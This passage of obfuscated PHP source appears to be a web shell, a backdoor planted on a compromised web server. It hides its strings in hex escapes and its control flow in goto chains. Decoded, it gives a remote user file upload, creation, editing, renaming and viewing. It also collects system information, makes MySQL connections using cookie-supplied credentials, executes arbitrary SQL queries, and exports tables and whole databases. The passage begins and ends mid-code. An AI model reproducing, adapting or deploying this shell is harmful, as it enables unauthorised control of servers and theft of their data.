"\x22\76\15\xa\x20\x20\40\40\x20\40\40\40\74\142\165\x74\x74\157\156\x20\164\171\160\x65\75\x22\163\x75\142\155\151\x74\42\x20\x63\x6c\x61\x73\163\75\x22\x62\164\156\x2d\x6d\157\x64\x65\x72\x6e\42\76\103\x6f\156\x6e\x65\143\x74\x3c\57\x62\165\x74\x74\x6f\x6e\x3e\xd\12\x20\40\40\40\x20\40\x20\40"; goto E4b34e4d98f74ca0; e53c642baf76e004: echo "\x22\x3e\15\12\40\x20\x20\40\x20\40\x20\40\40\x20\40\x20\74\x69\156\160\165\x74\x20\x74\x79\160\x65\x3d\42\150\x69\144\144\x65\x6e\x22\40\156\x61\x6d\145\x3d\x22\141\x77\x61\x6c\x22\40\x76\x61\x6c\165\x65\75\x22\x75\160\154\x5f\146\151\154\145\x22\76\xd\12\x20\40\40\40\40\x20\x20\x20\x20\x20\40\x20\74\151\x6e\x70\x75\164\x20\164\171\x70\x65\75\x22\150\151\144\144\x65\156\x22\40\x6e\x61\155\x65\75\42\x62\145\162\153\141\163\42\40\x76\141\154\x75\145\75\x22"; goto B8b81e1971df2e8e; B18ee73070df17a9: if (!(is_file($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3) && is_readable($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3))) { goto aa84b7d1b9bbf909; } goto e6563d1b2cb68258; D9fbeba27fd4c3b5: goto bacf0b9bbbad477b; goto ed85597261ff1bd6; b3d5756979fca915: $Ef8872caa0979af0 = $_POST["\x70\x65\x72\155"]; goto fc4a0db4d7164015; Ebecd1c7b86ef093: print "\x3c\x64\151\x76\40\x63\154\141\x73\x73\75\47\x62\141\x63\x61\137\x66\151\154\145\x27\x3e" . highlight_string(file_get_contents($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3), true) . "\74\x2f\144\151\166\76"; goto cb8c6a13323dfc60; b440476da7d3eb2c: $c23ccb231620b8be = $_FILES["\165\160\x6c\157\x61\144\137\146\151\x6c\x65"]["\x6e\141\155\x65"]; goto ba4edba25e810a8c; ec7fb3b37cd4a7a1: echo htmlspecialchars((function () { try { goto D27abfe479e6c520; E9ed1398cb44e962: if (!defined("\120\x48\x50\x5f\117\x53")) { goto c0273e9fc6f783c0; } goto Cb64e2377ed0de3c; Cb64e2377ed0de3c: return PHP_OS; goto cb98965f95cec395; D5d22804776cdecf: B4501cf74fb2e960: goto E9ed1398cb44e962; C325b9d9521e8504: return "\104\x69\x73\141\142\x6c\145\x64"; goto B132a51a2a93c19f; Ff04766a83df08ad: return php_uname(); goto C804aac883729bdc; D27abfe479e6c520: if (!function_exists("\x70\x68\160\x5f\x75\x6e\141\155\145")) { goto b36f92daaa980343; } goto Ff04766a83df08ad; B7446becfb7b10c1: return $F2d0f35c59fe5300; goto D5d22804776cdecf; C804aac883729bdc: b36f92daaa980343: goto ceeb288181073c55; cb98965f95cec395: c0273e9fc6f783c0: goto C325b9d9521e8504; ceeb288181073c55: if (!($F2d0f35c59fe5300 = getenv("\x4f\123"))) { goto B4501cf74fb2e960; } goto B7446becfb7b10c1; B132a51a2a93c19f: } catch (Throwable $E4d444a4fd968be8) { return "\104\151\x73\x61\x62\154\145\144"; } })()); goto E16f80a52447fde3; df8f3370e881b04e: c36f42c77b0e5bc2: goto daf39ca73f37e531; f061a7777b35dda9: cb64a1c5173b65a8: goto C20d88019ca7598f; e88dcc542851a79e: if ($ffc943dc0b3a48b0 == "\x65\x64\x69\164\137\146\151\x6c\x65" && isset($_POST["\x66\x61\x79\154"]) && trim($_POST["\146\141\x79\x6c"]) != '') { goto d73779543a2c3c6e; } goto F60dd77ee8eb5aa1; ba4edba25e810a8c: $d8463d93c69599f9 = a5FcEE151E68d72f($c23ccb231620b8be); goto f850c83df12e75ca; b9666080e1d7a90c: E7024ad3450cd790: goto b8523cd21cf387bd; a4e27eeb33efe7a7: goto E827728de818a895; goto d7852b92bb2c5c52; e5acc5d5f4204388: if (function_exists("\x67\145\x74\155\171\x67\x69\144")) { goto a2265460f426a6fd; } goto Fb78ac7b71713cd7; b3388d48b540757d: goto A159bc8e24a089cb; goto F550f944d7bce64b; E82b86a8b293ba13: $db79593b5ada69af = F64198cB3E765A83($_POST["\142\145\x72\153\141\163"]); goto Cbe7dccdf57995bc; d9e3f606e4ef9eb1: $f6f05644d791da73 = realpath($ceed1626500ecd14); goto c1a98f86504b130b; e1f47bb58658e791: goto F7e8daa86cbebf4c; goto ec893750ef3aa489; ce992f42a25b0e2d: if (file_exists($ddd38cf20fd62980)) { goto f6a4c81cf03c2f6e; } goto Fea08fe9ae74aed3; d5e932b4bd995ce0: $A62259e1f87e5d26 = ''; goto C530178181ca83c8; Dead51eadc21e102: if (!($D3dc074ce93d5c09 !== UPLOAD_ERR_NO_FILE)) { goto a9beac3095f36a76; } goto C97770659e565533; fc71bbafebc7ca4d: echo B526E9837163414e($f6f05644d791da73); goto eb4931c0d48e4f93; dc13fcf6e74af508: $C569a5da4ce82b4f = mysqli_insert_id($Abc2b55b9f3bce65); goto d7faab8f8d2b4293; F60dd77ee8eb5aa1: if (!is_dir($f6f05644d791da73)) { goto A5643143f453d4fe; } goto b32396b3dd0ccfe0; Ae02f358419a0f8e: E38eef57b43c2e76: goto d6d317f67e74eeab; c93c83d6ddc0fbb9: header("\103\157\x6e\164\x65\156\164\55\x4c\x65\x6e\x67\x74\150\x3a\40" . filesize($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3)); goto Dd9b8b3835dcf54f; A9e98a9686821a2b: $Cb7c56c153b6fafa = isset($_COOKIE["\x64\x61\x74\141\x62\141\163\145"]) ? $_COOKIE["\x64\141\164\141\142\141\x73\145"] : ''; goto B7de6069cc622736; deed07e15fed18a0: print "\74\57\144\151\166\76"; goto Abfce4bdf2ab3f76; Bbcadbf9df4ada30: d65983762f049448: goto b885dc1591f643ae; Cf424d42b24c1c3b: echo "\x3c\x2f\163\x70\141\156\x3e\xd\12\x20\x20\x20\40\x20\x20\x20\40\74\57\x70\x3e\xd\12\x20\x20\x20\40\x3c\57\144\x69\x76\76\xd\xa\74\57\x64\151\x76\x3e\15\xa\xd\xa\x3c\144\151\166\40\x63\154\141\163\163\75\x22\x6d\141\x69\156\x2d\x6e\141\x76\x2d\167\x72\141\160\x70\x65\162\42\x3e\xd\12\40\40\40\x20\x3c\144\x69\166\40\143\x6c\x61\x73\163\x3d\42\155\141\x69\156\x2d\x6e\141\x76\x22\76\15\xa\40\40\40\40\x20\40\x3c\x61\x20\x68\x72\145\146\75\42\152\141\x76\141\x73\x63\162\x69\160\164\x3a\x6e\141\x76\x69\x67\x61\x74\145\50\47\x61\167\x61\154\x27\x2c\40\47\144\x61\163\141\162\x27\x29\x3b\42\x20\x63\154\141\163\163\x3d\42\x62\x74\x6e\55\x6d\157\144\x65\x72\x6e\42\76\x3c\151\x20\143\154\141\x73\x73\75\x22\146\141\163\40\146\x61\x2d\150\x6f\x6d\145\42\76\74\57\x69\76\x20\x48\157\155\145\74\x2f\141\x3e\15\xa\40\40\x20\40\40\x20\74\141\x20\150\162\x65\146\x3d\42\x6a\x61\166\x61\x73\143\162\151\160\x74\x3a\x74\157\x67\147\x6c\145\125\x70\154\157\141\144\x28\51\73\42\40\143\x6c\141\163\x73\x3d\x22\x62\164\156\x2d\x6d\157\x64\x65\x72\156\x22\x3e\x3c\x69\40\143\x6c\141\x73\x73\75\42\x66\x61\x73\40\x66\x61\x2d\x75\x70\x6c\157\141\x64\x22\x3e\x3c\x2f\151\x3e\x20\x55\x70\x6c\157\x61\x64\74\x2f\x61\76\xd\xa\x20\x20\x20\40\40\40\74\141\x20\x68\162\x65\146\75\x22\x6a\141\x76\141\x73\143\x72\x69\160\x74\72\x6e\145\x77\106\x69\x6c\145\x28\51\x3b\x22\40\143\x6c\141\163\163\75\42\142\164\156\55\x6d\x6f\x64\x65\162\x6e\x22\76\x3c\x69\40\143\154\x61\163\163\75\42\146\141\163\x20\146\x61\x2d\160\154\x75\163\x2d\163\x71\165\141\x72\x65\x22\x3e\x3c\57\x69\76\40\116\x65\167\x20\x46\x69\154\145\74\x2f\141\x3e\xd\xa\40\40\x20\40\40\40\74\x61\x20\150\x72\x65\146\75\42\x6a\141\x76\x61\163\x63\162\x69\160\164\72\156\x65\x77\120\x61\160\153\x61\50\51\x3b\x22\40\x63\154\x61\x73\163\x3d\x22\x62\164\156\x2d\155\157\144\145\x72\x6e\x22\76\x3c\151\40\x63\x6c\x61\163\x73\75\42\146\x61\x73\x20\146\141\x2d\146\157\x6c\144\145\x72\x2d\160\154\165\x73\42\76\74\x2f\151\76\40\116\145\x77\40\x46\157\x6c\144\x65\x72\74\x2f\x61\76\15\xa\x20\40\x20\x20\40\40\74\141\40\150\x72\145\x66\x3d\x22\152\x61\x76\141\163\143\x72\151\x70\x74\72\x6e\141\x76\151\x67\141\164\145\50\x27\141\167\x61\x6c\x27\x2c\x20\47\x73\x69\163\164\145\155\x5f\x6b\157\155\x27\x2c\x20\x27\x62\x65\162\x6b\x61\x73\47\x2c\40\x27"; goto efcb2597008cb18d; E87f52f294ef1c9d: $D4923a741daf1b7e = "\x64\157\167\x6e\x6c\x6f\x61\x64\x65\144\x5f\x66\x69\154\145\x2e\x68\x74\155\154"; goto Dc6b8b6d4dbda44d; A36f099b82ddb604: $e5d5c12be91726b8 = rtrim($db79593b5ada69af, "\57") . "\57" . $d8463d93c69599f9; goto f330e0fa9e9371d6; E236890bf266942e: $Cd1e6c38bf6c5fac = $f6f05644d791da73; goto b12b585d622dfb8f; Eef7c03b5a2667af: $e7fc7ef47502e99b = isset($_COOKIE["\150\157\163\164"]) ? $_COOKIE["\x68\157\x73\x74"] : ''; goto Df50b1f403f50264; e8851813a25fe9de: if (!$Abc2b55b9f3bce65) { goto D9d56b8452fab038; } goto C70963d9029d5486; E5a64b545a9a8489: echo "\74\150\x72\40\163\164\x79\x6c\x65\x3d\42\142\x6f\162\x64\145\162\55\143\157\154\x6f\x72\72\40\43\63\x33\x33\73\40\142\157\162\x64\145\162\55\x73\x74\171\x6c\145\x3a\40\x64\157\164\164\145\x64\x3b\x22\76\xd\xa\xd\xa\74\x2f\x64\151\166\x3e\15\xa\xd\xa\15\xa\74\163\143\162\x69\160\164\x3e\xd\12\x2f\57\40\75\75\x3d\x3d\x3d\75\75\75\75\x3d\75\x3d\x3d\x3d\75\x3d\75\x3d\x3d\75\75\75\x3d\75\75\75\x3d\x3d\x3d\x3d\75\75\75\75\x3d\x3d\75\75\75\x3d\x3d\75\75\x3d\75\75\75\x3d\x3d\x3d\75\x3d\75\75\75\75\75\75\75\75\75\75\x3d\x3d\x3d\75\75\x3d\75\75\x3d\75\x3d\75\x3d\xd\12\57\x2f\40\112\x61\166\141\123\x63\x72\151\x70\x74\40\x66\165\x6e\x63\164\x69\157\156\x73\40\146\x6f\162\x20\x6e\141\x76\x69\x67\x61\x74\x69\157\156\x20\141\156\x64\40\151\x6e\164\145\162\141\x63\164\151\157\156\54\x20\x77\151\164\150\x20\160\x72\x6f\x6d\160\x74\x73\x20\x69\156\x20\x45\x6e\x67\x6c\x69\163\x68\56\xd\12\57\57\x20\x3d\x3d\75\x3d\x3d\75\x3d\75\75\75\x3d\75\x3d\75\x3d\75\x3d\75\75\75\x3d\x3d\x3d\x3d\x3d\75\75\75\x3d\75\x3d\x3d\75\75\x3d\x3d\75\75\x3d\x3d\75\x3d\x3d\x3d\x3d\75\75\75\x3d\x3d\75\x3d\x3d\x3d\75\x3d\75\x3d\75\x3d\x3d\75\75\x3d\x3d\x3d\75\x3d\x3d\75\75\x3d\x3d\75\75\xd\12\146\x75\x6e\x63\164\151\x6f\156\40\x6e\141\166\151\147\x61\164\x65\50\51\40\173\xd\12\40\x20\40\x20\143\x6f\x6e\163\164\x20\146\157\x72\155\40\x3d\40\x64\157\143\x75\x6d\145\x6e\x74\56\143\162\x65\x61\x74\x65\105\154\145\x6d\x65\156\164\50\47\x66\157\x72\x6d\x27\51\x3b\15\12\40\x20\40\x20\146\157\162\x6d\x2e\x6d\x65\x74\150\x6f\x64\x20\x3d\x20\47\x50\x4f\x53\124\47\73\15\xa\40\x20\x20\x20\146\x6f\x72\155\56\x61\143\164\x69\x6f\156\x20\x3d\x20\47\x27\73\xd\12\x20\40\40\40\x66\157\x72\155\56\163\164\171\x6c\x65\56\x64\151\163\x70\154\x61\x79\x20\75\x20\x27\156\x6f\x6e\145\x27\x3b\15\12\40\x20\x20\40\143\x6f\156\163\164\40\160\141\x72\x61\155\163\x20\75\x20\x7b\x7d\x3b\15\xa\40\40\40\x20\146\157\x72\x20\x28\154\145\164\40\x69\x20\x3d\40\60\x3b\40\x69\40\x3c\40\x61\x72\147\165\155\x65\x6e\164\163\56\154\145\156\147\x74\x68\73\40\x69\x20\x2b\x3d\40\62\51\40\173\15\xa\x20\x20\40\x20\x20\40\x20\40\x70\141\x72\141\x6d\163\133\x61\162\x67\x75\155\x65\156\x74\x73\x5b\151\x5d\135\x20\75\40\x61\162\147\165\x6d\x65\156\x74\x73\x5b\151\x20\x2b\40\61\135\73\15\xa\40\x20\40\40\x7d\15\xa\xd\12\x20\40\x20\40\x69\x66\x20\x28\x21\x70\141\x72\141\155\x73\x2e\x68\x61\x73\117\x77\x6e\x50\162\x6f\x70\145\x72\164\171\50\x27\x61\167\141\154\x27\x29\x20\x26\x26\40\160\x61\162\x61\x6d\163\x2e\150\x61\x73\x4f\167\x6e\120\162\x6f\x70\x65\x72\x74\171\x28\x27\142\x65\x72\x6b\x61\163\x27\51\51\x20\x7b\15\12\40\x20\x20\x20\x20\40\40\x20\57\x2f\x20\x54\x68\151\163\40\151\163\40\x61\x20\x64\x69\x72\x65\143\164\x6f\x72\x79\40\156\x61\166\x69\x67\141\x74\x69\x6f\156\x2c\40\x64\157\40\156\x6f\164\40\x73\145\x74\x20\144\145\146\x61\x75\154\164\40\47\141\x77\x61\154\47\15\12\x20\40\x20\40\x7d\40\x65\154\x73\x65\40\151\146\40\x28\x21\160\x61\162\141\x6d\x73\x2e\150\141\163\x4f\x77\156\x50\162\157\160\145\x72\164\171\x28\x27\141\167\x61\x6c\47\51\x29\x20\173\15\12\x20\x20\x20\x20\x20\x20\x20\x20\160\x61\x72\141\x6d\163\x5b\47\141\x77\141\x6c\47\135\x20\75\x20\47\144\141\x73\141\x72\x27\x3b\15\xa\x20\40\40\x20\x20\40\x20\40\x2f\x2f\40\x44\x65\x66\141\165\x6c\x74\40\x61\143\x74\151\157\x6e\xd\xa\x20\x20\x20\40\175\15\12\xd\xa\x20\40\x20\x20\146\157\x72\x20\x28\x63\x6f\156\163\164\40\x6b\145\x79\x20\151\x6e\x20\x70\141\162\141\x6d\163\51\40\173\15\xa\x20\40\40\40\x20\x20\x20\40\151\x66\x20\50\160\x61\x72\x61\x6d\163\56\150\x61\x73\x4f\x77\x6e\120\x72\x6f\x70\x65\162\x74\x79\x28\153\x65\171\51\x29\x20\x7b\xd\xa\40\40\x20\40\40\x20\x20\40\x20\x20\x20\40\x63\x6f\156\163\x74\x20\151\156\160\x75\164\40\75\40\x64\157\143\x75\x6d\x65\x6e\x74\56\143\x72\145\141\x74\x65\x45\154\x65\x6d\x65\156\164\x28\47\x69\156\160\165\164\47\x29\x3b\xd\12\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\151\x6e\x70\165\x74\x2e\x74\x79\x70\145\x20\75\40\x27\x68\x69\144\144\x65\156\x27\73\xd\xa\x20\40\40\40\x20\x20\x20\40\40\x20\40\40\x69\156\160\165\x74\56\x6e\141\155\145\40\75\40\x6b\145\171\x3b\xd\xa\40\x20\x20\x20\40\40\40\40\x20\x20\40\40\x69\x6e\x70\165\164\x2e\166\141\154\165\x65\40\75\x20\x70\x61\162\x61\x6d\163\133\153\145\x79\135\73\15\12\40\x20\x20\40\x20\40\x20\40\40\40\x20\x20\146\x6f\x72\155\56\141\160\160\x65\156\144\x43\x68\x69\x6c\x64\x28\151\x6e\x70\165\x74\x29\73\xd\xa\40\40\x20\40\x20\40\x20\x20\x7d\xd\xa\40\40\40\x20\175\15\12\40\x20\x20\40\xd\12\x20\40\x20\40\x64\x6f\x63\165\x6d\x65\156\x74\x2e\x62\157\144\x79\56\141\160\x70\x65\x6e\x64\x43\150\x69\x6c\144\x28\146\157\162\155\x29\x3b\15\xa\x20\40\40\x20\x66\x6f\x72\155\x2e\163\x75\142\155\x69\x74\50\51\73\15\xa\x7d\xd\xa\xd\xa\146\165\x6e\x63\164\151\157\x6e\x20\x63\150\141\156\x67\145\106\151\154\145\116\141\155\145\50\156\141\155\x65\54\40\x66\x61\x79\154\x29\xd\12\x7b\15\xa\11\166\x61\162\x20\x67\x65\164\116\x65\167\116\141\x6d\145\x20\75\40\x70\162\x6f\x6d\x70\164\x28\x27\103\150\141\156\147\145\40\x66\151\154\x65\x20\156\x61\155\145\x3a\47\54\40\x6e\141\x6d\145\51\73\15\12\11\x69\146\50\x67\x65\164\x4e\x65\167\x4e\x61\x6d\x65\x29\15\xa\11\x7b\15\xa\x9\11\156\x61\166\151\147\x61\164\145\50\x27\141\167\x61\x6c\x27\x2c\x20\x27\x72\x65\x6e\x61\x6d\x65\137\x66\151\x6c\145\x27\x2c\x20\x27\146\x61\171\x6c\x27\54\x20\x66\x61\171\x6c\x2c\40\x27\156\145\167\x5f\156\x61\155\x65\x27\x2c\x20\x62\x36\64\x45\x6e\143\x6f\x64\x65\x55\x6e\151\143\157\144\x65\x28\147\x65\x74\116\x65\x77\116\x61\155\x65\x29\54\x20\x27\x62\x65\x72\153\141\163\x27\x2c\40\47"; goto Bc211c394d0aed79; Bc197fa15a90bc0f: D497b4650559ae71: goto Af4eb0071f98fb32; A6015eed3ecc8f5d: try { goto C5d19d419fcdaed0; D100ef14f4c54ed0: bf452344ca66fa84: goto c41f6125b49259e8; a539fd739fab202f: $dd10a73ee2d1f279 = new PDO("\155\x79\x73\161\x6c\72\150\x6f\x73\x74\x3d" . $e7fc7ef47502e99b . "\73\x63\x68\x61\x72\x73\x65\x74\75\165\x74\146\70\x3b" . $a5064888437638ee, $cf583f5d73ccf3cf, $c887d06bec538904, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\x53\x45\x54\x20\x4e\101\115\x45\123\x20\x27\165\x74\146\x38\x27")); goto e6ece699b5238395; Cc01470aa1f4708e: goto bf4becd631cb00df; goto b09532cf6d690c8f; be3b2c481ea0dc64: echo "\x53\145\154\145\x63\164\40\x61\x20\x64\141\x74\141\x62\141\x73\x65\x20\x66\x72\x6f\155\40\x74\x68\x65\x20\163\151\144\145\142\141\162\x20\x74\157\40\142\x65\x67\151\156\x2e"; goto e72e49b610302a12; c41f6125b49259e8: $c086d6a462e02397++; goto fa81f428c5058fae; e6ece699b5238395: $dd10a73ee2d1f279->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); goto b97f3af8291b2d6f; ac692ce52517d91e: ad1243fc23cce38d: goto c75733ddc5ba105a; A10281f8fa5c74a8: goto df41816e948a40da; goto a68ff5beb93a0957; e5f97a49812a6cdf: e1eb1d8d1d5a7f9e: goto aef59ccf529886cb; f8c40e073af7514d: goto E303a37bc9516565; goto B721362a017199d9; e1186e656523841b: echo "\x51\165\x65\162\171\x20\145\x78\145\x63\x75\x74\x65\144\x20\163\x75\143\143\145\163\x73\x66\x75\x6c\x6c\171\x2c\x20\x62\165\164\x20\x72\x65\164\165\x72\x6e\145\x64\40\x6e\x6f\x20\162\145\163\165\x6c\x74\x73\x2e"; goto f40e65a132307d2d; F013a8bb1a30c224: $fc8855223935f94b = $dd10a73ee2d1f279->query($a135c38d02b9cf23); goto A9fc6832a1c1cf43; B4f5f7fdc8689022: df41816e948a40da: goto a162c1ff30777bc4; F87eda23006b64ee: echo "\74\x75\154\x20\x63\x6c\x61\163\163\75\x22\144\x62\55\154\151\x73\x74\42\x3e"; goto c49558e9a241b13d; B257ad39cb739b5a: D91f2c3af662d025: goto cde2b5bbe32a3fd6; a15aa5004dd9bae6: echo "\74\x68\64\x3e\x44\x61\164\141\142\141\x73\145\x73\74\x2f\150\64\76"; goto F87eda23006b64ee; Fce50d412fe7db63: e58e259b6acdcc4d: goto ecffa3b0d3d8277a; c05a6ee62b370edf: echo "\74\164\x61\142\x6c\x65\40\x63\x6c\x61\x73\x73\75\42\146\x4d\141\156\x61\x67\145\162\x20\x64\x61\164\x61\x2d\x74\x61\x62\x6c\145\x22\x3e\x3c\164\150\x65\141\144\76\x3c\x74\162\x3e"; goto e102fbbf73c3946b; F4129cc32729d81c: Fd72a5942e02a796: goto Ee1b107c5886cce5; d308aba8db0b9509: if (!($c086d6a462e02397 <= $A99499e948bd463c)) { goto D91f2c3af662d025; } goto afefaee55ee155d8; c986dd7b7d979571: if (isset($_POST["\164"]) && is_string($_POST["\x74"]) && !empty($_POST["\164"])) { goto D59415d47fe629ea; } goto E523b91e87d9576d; a162c1ff30777bc4: bf4becd631cb00df: goto Ce0bf237875b5f1a; a68ff5beb93a0957: F3b73767596ffa22: goto A329d1a106005150; C0ccfdd810169f76: B4fc5a7bff417d20: goto E59465cbcee8df60; c75733ddc5ba105a: echo "\x3c\x2f\165\x6c\76"; goto C0ccfdd810169f76; C75674f01d2d572b: $c240f705a5351ab8 = isset($_POST["\150\141\x6c\141\x6d\x61\x6e"]) && is_numeric($_POST["\x68\x61\154\x61\x6d\x61\x6e"]) && $_POST["\x68\141\154\141\x6d\141\x6e"] >= 1 && $_POST["\x68\x61\x6c\141\x6d\141\x6e"] <= $A99499e948bd463c ? (int) $_POST["\x68\141\x6c\141\155\141\x6e"] : 1; goto E4bf2553e3e6b348; f03977f46fcc7140: foreach ($Bae9033c3cf95c45[0] as $Ae96d7849ebef399 => $af3f628034377275) { echo "\x3c\164\x68\76" . htmlspecialchars($Ae96d7849ebef399) . "\x3c\57\144\151\x76\76\74\57\x74\x68\x3e"; c3cbad23a72221f6: } goto D76b3a9ee7ee7a2d; f27fc7bf1a3ce7ac: $Fb08e115b362cc65 = $B21e8e9a58247acc->fetchAll(PDO::FETCH_COLUMN); goto c7f4d7da121c4392; A329d1a106005150: $A99499e948bd463c = ceil($f0339209096c1407 / 100); goto C75674f01d2d572b; a984f4f9d7320acc: echo "\x3c\x64\151\166\x20\143\x6c\x61\x73\x73\x3d\x22\x70\141\x67\151\x6e\141\x74\x69\x6f\156\42\x3e"; goto d2afbd15e4033e73; B0f0a6fbeef28c85: echo "\74\x68\x34\x3e\123\x51\114\40\121\165\x65\162\171\74\x2f\x68\64\x3e"; goto E2baa5fe9a246f00; af367ab405869282: fc330fb5ebdc8dda: goto efa7474a0d379c75; Fdc4c7afccdb8f06: $f0339209096c1407 = (int) $Ac8bb594661cb922->fetchColumn(); goto D583dfa43c0abc68; e4d36e2547ebd10c: echo "\x3c\150\64\x20\x73\x74\x79\x6c\x65\75\x22\x6d\141\162\147\x69\x6e\55\164\157\x70\72\40\x31\56\62\x72\x65\x6d\73\42\76\124\x61\x62\154\145\163\x3c\57\150\x34\76"; goto d8b6cce12561a83b; C6796939b285d3c9: if (empty($Cb7c56c153b6fafa)) { goto B4fc5a7bff417d20; } goto e0a4ec3184a85698; c67473208765d39b: echo "\x53\x65\154\145\143\164\40\x61\x20\x74\x61\x62\154\x65\40\146\x72\x6f\155\x20\164\x68\x65\40\x73\x69\144\x65\x62\x61\x72\x20\x74\157\x20\166\x69\x65\x77\x20\151\x74\163\40\143\x6f\156\x74\x65\156\164\56"; goto f3968ae53432f62f; cde2b5bbe32a3fd6: echo "\74\x2f\x64\151\166\x3e"; goto A44bd9ed0f3a383a; Ac1b1c322cb7d0e8: Cb925057168e7817: goto d308aba8db0b9509; ac8750d03776c2db: if (count($Bae9033c3cf95c45) > 0) { goto c7fee83713868baf; } goto e1186e656523841b; Aea2748e3599ca2a: echo "\74\x73\160\x61\156\40\x63\154\141\163\163\x3d\42\x71\x61\x6c\151\156\42\x3e\x54\x61\x62\x6c\x65\72\x3c\57\x73\160\141\156\x3e\x20" . htmlspecialchars($A815e8104dbdb799) . "\x20\x28\x20\x3c\x61\x20\x68\162\145\x66\75\x22\x6a\141\166\141\x73\x63\162\151\x70\x74\72\x6e\x61\166\151\147\141\164\145\x28\x27\141\167\x61\x6c\47\54\40\47\x73\153\154\137\144\x5f\x74\x27\x2c\40\x27\164\x27\54\x20\x27" . b526E9837163414E($A815e8104dbdb799) . "\47\x29\42\x3e\x45\170\160\x6f\162\164\40\124\x61\142\154\145\74\x2f\x61\x3e\x20\x7c\40\74\x61\x20\150\162\145\x66\75\x22\152\141\x76\141\163\143\162\151\x70\164\72\x6e\x61\166\151\147\x61\x74\145\x28\47\141\x77\141\154\47\54\40\47\163\153\154\137\x64\x27\x29\73\42\x3e\105\x78\x70\x6f\162\164\40\104\141\164\141\142\x61\x73\145\74\x2f\141\76\x20\51"; goto A9b4b2a021e942e7; Ee1b107c5886cce5: $a135c38d02b9cf23 = f64198cB3e765a83($_POST["\145\x6d\162"]); goto c4a27a2bbc855abf; fa81f428c5058fae: goto Cb925057168e7817; goto B257ad39cb739b5a; D2af9ce7da814fe1: echo "\74\144\151\x76\40\x63\x6c\x61\x73\x73\75\42\x64\x62\55\x63\x6f\x6e\x74\x61\x69\156\x65\x72\x22\x3e"; goto b56f4429389289f9; E2baa5fe9a246f00: echo "\74\x74\145\x78\164\x61\x72\x65\x61\40\151\144\75\x22\163\x6b\154\137\145\155\x72\x22\40\143\x6c\x61\163\163\75\x22\146\151\154\x65\137\145\144\151\164\42\40\163\x74\x79\x6c\145\75\x22\x68\x65\151\147\150\164\x3a\x20\61\62\60\x70\170\73\42\76\74\x2f\164\145\170\x74\x61\x72\x65\x61\x3e"; goto e79baad1fcde0d2c; Bee2da8c00be0b76: $Bae9033c3cf95c45 = $fc8855223935f94b->fetchAll(); goto fe04d8270d188341; d0292eadee799ce4: echo "\x3c\x64\x69\166\40\143\x6c\x61\163\x73\75\x22\x64\142\55\164\141\x62\154\x65\55\151\156\146\157\42\x3e"; goto Aea2748e3599ca2a; f4a5e5702462e3ca: $A815e8104dbdb799 = f64198cb3E765a83($_POST["\x74"]); goto d0292eadee799ce4; D76b3a9ee7ee7a2d: B8b21d1900a2cd8a: goto B27eade099f2294d; Def5c7fe989f25b8: E3123498f1b1b72f: goto Cc01470aa1f4708e; F1b53d54d49c0751: $Efce2ba71df08569 = isset($_POST["\x74"]) ? f64198cB3E765A83($_POST["\164"]) : ''; goto b6305ddb8a213b6e; Ad524ebe35b1595d: f6afa9a82339a1f4: goto D0f473f58ad6166f; efa7474a0d379c75: B3d495cab320ae0c: goto Def5c7fe989f25b8; acb5ca9a15b36720: goto B3d495cab320ae0c; goto Fce50d412fe7db63; aef59ccf529886cb: echo "\74\57\164\x62\157\x64\171\x3e\74\57\x74\141\142\x6c\145\76\74\57\x64\x69\x76\76"; goto B3079afca805a365; D31b23c22208974f: echo "\x54\x61\x62\x6c\145\40\156\157\x74\40\x66\x6f\165\156\144\x21"; goto A10281f8fa5c74a8; b56f4429389289f9: echo "\74\x64\151\166\40\143\154\141\x73\x73\75\42\x64\142\x2d\163\151\144\x65\x62\141\x72\x22\76"; goto a15aa5004dd9bae6; Ffb6b178c3d648c9: c8c30bc4215d0deb: goto adda429f17ca60b6; f431084685a2b930: $fc8855223935f94b = $dd10a73ee2d1f279->query("\123\x45\114\105\103\x54\x20\x2a\x20\x46\x52\117\115\40\140" . $A815e8104dbdb799 . "\x60\x20\114\x49\x4d\111\124\40" . $F04ef0bae935dbe7 . "\40\54\40\61\x30\x30"); goto Bee2da8c00be0b76; baab9b4ce96643db: foreach ($Bae9033c3cf95c45 as $Fb990e0c2cbb02f7) { goto a223ba4fc5ad69ff; E2dd297e18605eee: e9af10493b69c31a: goto a8131077ed2168da; E54ed7f7f82640c2: D3b4e9c97be2e8e8: goto Aa114ab7ce71bb1d; Ce603567c5c3f388: foreach ($Fb990e0c2cbb02f7 as $af3f628034377275) { echo "\74\x74\144\x3e\74\x64\151\x76\x3e" . htmlspecialchars($af3f628034377275) . "\x3c\x2f\144\x69\x76\x3e\74\57\164\x64\x3e"; f45165a7e6721ca9: } goto E2dd297e18605eee; a223ba4fc5ad69ff: echo "\74\x74\x72\76"; goto Ce603567c5c3f388; a8131077ed2168da: echo "\x3c\x2f\164\x72\x3e"; goto E54ed7f7f82640c2; Aa114ab7ce71bb1d: } goto Ad524ebe35b1595d; a844eef8a8fa6095: echo "\74\164\141\142\154\145\40\143\154\x61\163\x73\75\42\x66\115\x61\x6e\141\x67\x65\x72\x20\144\x61\164\x61\x2d\164\141\142\x6c\145\x22\x3e\74\x74\150\145\x61\144\x3e\74\164\x72\x3e"; goto f03977f46fcc7140; e0a4ec3184a85698: $D37ef5b6311dceff = $dd10a73ee2d1f279->prepare("\x53\105\x4c\x45\x43\124\40\x74\x61\142\154\x65\137\x6e\x61\155\145\40\x66\x72\157\x6d\x20\x69\156\146\x6f\x72\x6d\x61\164\x69\157\156\137\x73\x63\150\145\x6d\x61\56\164\x61\142\154\x65\163\x20\167\150\x65\162\x65\40\164\x61\x62\154\145\137\x73\143\150\x65\155\x61\x3d\77"); goto F61455bf51e9a330; b734157b3c10bb2e: echo "\74\57\164\x72\x3e\x3c\57\x74\150\145\141\144\x3e\74\164\142\x6f\x64\x79\x3e"; goto Fe30ee2b943d592f; d8b6cce12561a83b: echo "\x3c\x75\x6c\40\143\154\x61\163\x73\x3d\42\144\142\55\154\151\x73\x74\42\76"; goto F1b53d54d49c0751; adda429f17ca60b6: echo "\74\x2f\165\x6c\x3e"; goto C6796939b285d3c9; Db1059f2cb5786cf: if (empty($Cb7c56c153b6fafa)) { goto f880ec7847e96575; } 